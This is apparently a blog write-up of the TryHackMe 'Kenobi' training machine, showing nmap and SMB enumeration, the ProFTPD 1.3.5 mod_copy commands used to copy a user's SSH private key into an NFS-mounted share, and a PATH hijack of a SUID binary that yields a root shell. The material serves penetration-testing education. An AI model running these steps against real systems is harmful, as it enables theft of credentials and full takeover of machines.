My Computer

17 object(s)


Kenobi is the third machine in TryHackMe’s “Offensive pentesting” path.


Starting with nmap scan:

nmap -sC -sV
Starting Nmap 7.80 ( ) at 2020-10-09 06:43 EDT
Nmap scan report for
Host is up (0.042s latency).
Not shown: 993 closed ports
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      36449/tcp   mountd
|   100005  1,2,3      39549/tcp6  mountd
|   100005  1,2,3      48915/udp   mountd
|   100005  1,2,3      51195/udp6  mountd
|   100021  1,3,4      34801/tcp6  nlockmgr
|   100021  1,3,4      38033/tcp   nlockmgr
|   100021  1,3,4      56194/udp6  nlockmgr
|   100021  1,3,4      56722/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2020-10-09T05:43:51-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-10-09T10:43:51
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 16.02 seconds

So we have Samba on this machine. Samba is the standard Windows interoperability suite of programs for Linux and Unix. Let’s enumerate it more close with NSE scripts of nmap:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse
Starting Nmap 7.80 ( ) at 2020-10-09 07:04 EDT
Nmap scan report for
Host is up (0.086s latency).

445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\\IPC$:
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\anonymous:
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\print$:
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds

Let’s connect to the \\\anonymous share:

smbclient //

or you can use smbget to download the share:

smbget -R smb://

The only one file is there. By opening this file we can learn that id_rsa file can be found at /home/kenobi/.ssh/id_rsa.
Let’s more closely look on the FTP server now. Nmap is highlighted that the ProFTPD 1.3.5 is running on port 21.
If search for the available exploits, we can find a few:

searchsploit ProFTPD 1.3.5
 Exploit Title                                                                                                                                                                                           |  Path
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)|         linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution|         linux/remote/
ProFTPd 1.3.5 - File Copy|         linux/remote/36742.txt

The version is matched, and we can see that mod_copy one even have the Metasploit module. But we don’t really need it. Let’s read the exploit and the official documentation instead. We can learn from it that the mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files on the machine. We also the rpcbind running on the port 111, let’s enumerate it too:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount
Starting Nmap 7.80 ( ) at 2020-10-09 06:42 EDT
Nmap scan report for
Host is up (0.046s latency).

111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds                                                          

Great. Now we know that it’s possible to mount /var folder on the machine and we potentially have a way to copy some files to it.


Connect to the port 21 with the nc and try to use mod_copy commands:

nc 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) []
SITE CPFR /home/kenobi/.id_rsa
550 /home/kenobi/.id_rsa: No such file or directory
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

Awesome, we’re now have SSH key in the /var folder. Let’s mount it and grab it:

sudo mkdir /mnt/kenobiNFS
sudo mount /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root    4096 Sep  4  2019 .
drwxr-xr-x  3 root root    4096 Oct  9 06:45 ..
drwxr-xr-x  2 root root    4096 Sep  4  2019 backups
drwxr-xr-x  9 root root    4096 Sep  4  2019 cache
drwxrwxrwt  2 root root    4096 Sep  4  2019 crash
drwxr-xr-x 40 root root    4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff   4096 Apr 12  2016 local
lrwxrwxrwx  1 root root       9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail    4096 Feb 26  2019 mail
drwxr-xr-x  2 root root    4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root       4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root    4096 Jan 29  2019 snap
drwxr-xr-x  5 root root    4096 Sep  4  2019 spool
drwxrwxrwt  6 root root    4096 Oct  9 06:34 tmp
drwxr-xr-x  3 root root    4096 Sep  4  2019 www

Now we should try to use this SSH key, as we know the user name too. Copy the SSH key to some folder, and add the chmod 600 to it:

cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@

kenobi@kenobi:~$ whoami


All the “standard” enumeration scripts will pick that up, but it’s good to know how to do things by hands.
The following command can locate all the files with SUID bit (means that they will be executed with the root permissions):

find / -perm -u=s -type f 2>/dev/null

By reviewing the output we can say that /usr/bin/menu is standing out a bit. You can use the command strings to examine the binary:

kenobi@kenobi:~$ strings /usr/bin/menu
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
 Invalid choice
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609

It’s quite messy, but don’t worry. Just read it line by line and try to make sense of it. If you will try to run the binary you will see the following:

1. status check
2. kernel version
3. ifconfig
** Enter your choice :

In the strings output we have this chunk of code right after it:

curl -I localhost
uname -r

Noticed that it’s calling the curl without specifying the absolute path? That should ring the bell for you, as this is our way in. To move forward you need to understand how $PATH in Linux works. That might be a good reading. Let’s do the trick:

kenobi@kenobi:/tmp$ echo /bin/bash > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:/tmp# whoami

Hooray! We have a root shell!

Take a second to understand what we did here. We created a file named curl with a string /bin/bash in it. We exported the /tmp folder into the $PATH variable, do the /usr/bin/menu will start to look for a binary named curl in it first. Let’s check the $PATH to make sure:

kenobi@kenobi:/tmp$ echo $PATH

As the /usr/bin/menu is not specified the absolute path of the binary curl, it will start looking for it in each location from the $PATH. /tmp, /home/kenobi/bin, /home/kenobi/.local/bin, etc. As we have our “fake” curl inside of the first folder, and the /usr/bin/menu is executing with the root privileges, we get the root shell.